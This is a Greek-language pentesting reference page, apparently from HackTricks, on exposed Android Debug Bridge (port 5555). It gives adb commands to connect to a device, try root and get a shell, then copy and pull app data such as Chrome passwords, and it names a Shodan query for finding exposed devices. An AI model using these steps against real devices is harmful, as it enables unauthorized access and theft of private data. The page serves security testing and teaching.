# 5555 - Android Debug Bridge {{#include ../banners/hacktricks-training.md}} ## Basic Information Από [the docs](https://developer.android.com/studio/command-line/adb): **Android Debug Bridge** (adb) είναι ένα ευέλικτο εργαλείο γραμμής εντολών που σας επιτρέπει να επικοινωνείτε με μια συσκευή. Η εντολή adb διευκολύνει μια ποικιλία ενεργειών στη συσκευή, όπως η **εγκατάσταση και η αποσφαλμάτωση εφαρμογών**, και παρέχει **πρόσβαση σε ένα Unix shell** που μπορείτε να χρησιμοποιήσετε για να εκτελέσετε μια ποικιλία εντολών σε μια συσκευή. **Default port**: 5555. ``` PORT STATE SERVICE VERSION 5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909) ``` ## Συνδέσου Αν βρεις την υπηρεσία ADB να τρέχει σε μια θύρα μιας συσκευής και μπορείς να συνδεθείς σε αυτήν, **μπορείς να αποκτήσεις ένα shell μέσα στο σύστημα:** ```bash adb connect 10.10.10.10 adb root # Try to escalate to root adb shell ``` Για περισσότερες εντολές ADB, ελέγξτε την παρακάτω σελίδα: {{#ref}} ../mobile-pentesting/android-app-pentesting/adb-commands.md {{#endref}} ### Εκχύλιση Δεδομένων Εφαρμογής Για να κατεβάσετε εντελώς τα δεδομένα μιας εφαρμογής, μπορείτε: ```bash # From a root console chmod 777 /data/data/com.package cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data. adb pull "/sdcard/com.package" ``` Μπορείτε να χρησιμοποιήσετε αυτό το κόλπο για **να ανακτήσετε ευαίσθητες πληροφορίες όπως κωδικούς πρόσβασης του chrome**. Για περισσότερες πληροφορίες σχετικά με αυτό, ελέγξτε τις πληροφορίες που παρέχονται στις αναφορές [**εδώ**](https://github.com/carlospolop/hacktricks/issues/274). ## Shodan - `android debug bridge` {{#include ../banners/hacktricks-training.md}}